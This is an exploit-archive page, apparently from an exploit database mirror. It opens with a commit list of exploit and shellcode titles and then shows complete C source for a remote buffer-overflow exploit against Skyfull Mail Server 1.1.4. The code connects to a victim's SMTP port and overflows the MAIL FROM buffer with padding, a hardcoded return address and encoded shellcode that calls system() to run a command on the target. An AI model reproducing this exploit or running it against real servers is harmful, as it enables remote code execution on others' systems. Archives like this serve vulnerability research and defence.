880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
102 lines
No EOL
3.6 KiB
C
102 lines
No EOL
3.6 KiB
C
// source: https://www.securityfocus.com/bid/759/info
|
|
|
|
The Skyfull mail server version 1.1.4 has an unchecked buffer into which the argument from the MAIL FROM command is placed. This buffer can be overwritten and arbitrary code can be executed.
|
|
|
|
/*=============================================================================
|
|
Skyfull Mail Server Version 1.1.4 Exploit
|
|
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
|
|
Written by UNYUN (shadowpenguin@backsection.net)
|
|
=============================================================================
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
#include <windows.h>
|
|
#include <winsock.h>
|
|
|
|
#define MAXBUF 3000
|
|
#define RETADR 655
|
|
#define JMPADR 651
|
|
#define SMTP_PORT 25
|
|
#define JMPEAX_ADR 0xbfe0a035
|
|
|
|
unsigned char exploit_code[200]={
|
|
0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3,
|
|
0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,
|
|
0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4,
|
|
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,
|
|
0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53,
|
|
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,
|
|
0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF,
|
|
0xFF,0x00
|
|
};
|
|
unsigned char cmdbuf[200]="msvcrt.dll.system.welcome.exe";
|
|
|
|
main(int argc,char *argv[])
|
|
{
|
|
SOCKET sock;
|
|
SOCKADDR_IN addr;
|
|
WSADATA wsa;
|
|
WORD wVersionRequested;
|
|
unsigned int ip,p1,p2;
|
|
static unsigned char buf[MAXBUF],packetbuf[MAXBUF+1000];
|
|
struct hostent *hs;
|
|
|
|
if (argc<2){
|
|
printf("usage: %s VictimHost\n",argv[0]); return -1;
|
|
}
|
|
wVersionRequested = MAKEWORD( 2, 0 );
|
|
if (WSAStartup(wVersionRequested , &wsa)!=0){
|
|
printf("Winsock Initialization failed.\n"); return -1;
|
|
}
|
|
if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
|
|
printf("Can not create socket.\n"); return -1;
|
|
}
|
|
addr.sin_family = AF_INET;
|
|
addr.sin_port = htons((u_short)SMTP_PORT);
|
|
if ((addr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
|
|
if ((hs=gethostbyname(argv[1]))==NULL){
|
|
printf("Can not resolve specified host.\n"); return -1;
|
|
}
|
|
addr.sin_family = hs->h_addrtype;
|
|
memcpy((void *)&addr.sin_addr.s_addr,hs->h_addr,hs->h_length);
|
|
}
|
|
if (connect(sock,(LPSOCKADDR)&addr,sizeof(addr))==SOCKET_ERROR){
|
|
printf("Can not connect to specified host.\n"); return -1;
|
|
}
|
|
recv(sock,packetbuf,MAXBUF,0);
|
|
printf("BANNER FROM \"%s\" : %s\n",argv[1],packetbuf);
|
|
|
|
memset(buf,0x90,MAXBUF); buf[MAXBUF]=0;
|
|
ip=JMPEAX_ADR;
|
|
buf[RETADR ]=ip&0xff;
|
|
buf[RETADR+1]=(ip>>8)&0xff;
|
|
buf[RETADR+2]=(ip>>16)&0xff;
|
|
buf[RETADR+3]=(ip>>24)&0xff;
|
|
buf[JMPADR ]=0xeb;
|
|
buf[JMPADR+1]=0x80;
|
|
|
|
strcat(exploit_code,cmdbuf);
|
|
p1=(unsigned int)LoadLibrary;
|
|
p2=(unsigned int)GetProcAddress;
|
|
exploit_code[0x0d]=p1&0xff;
|
|
exploit_code[0x0e]=(p1>>8)&0xff;
|
|
exploit_code[0x0f]=(p1>>16)&0xff;
|
|
exploit_code[0x10]=(p1>>24)&0xff;
|
|
exploit_code[0x1e]=p2&0xff;
|
|
exploit_code[0x1f]=(p2>>8)&0xff;
|
|
exploit_code[0x20]=(p2>>16)&0xff;
|
|
exploit_code[0x21]=(p2>>24)&0xff;
|
|
|
|
memcpy(buf+JMPADR-strlen(exploit_code)-1,exploit_code,strlen(exploit_code));
|
|
|
|
sprintf(packetbuf,"HELO UNYUN\n");
|
|
send(sock,packetbuf,strlen(packetbuf),0);
|
|
recv(sock,packetbuf,MAXBUF,0);
|
|
printf("HELO: Reply from \"%s\" : %s\n",argv[1],packetbuf);
|
|
sprintf(packetbuf,"MAIL FROM: UNYUN <%s@shadowpenguin.net>\r\n",buf);
|
|
send(sock,packetbuf,strlen(packetbuf),0);
|
|
closesocket(sock);
|
|
printf("Done.\n");
|
|
return FALSE;
|
|
} |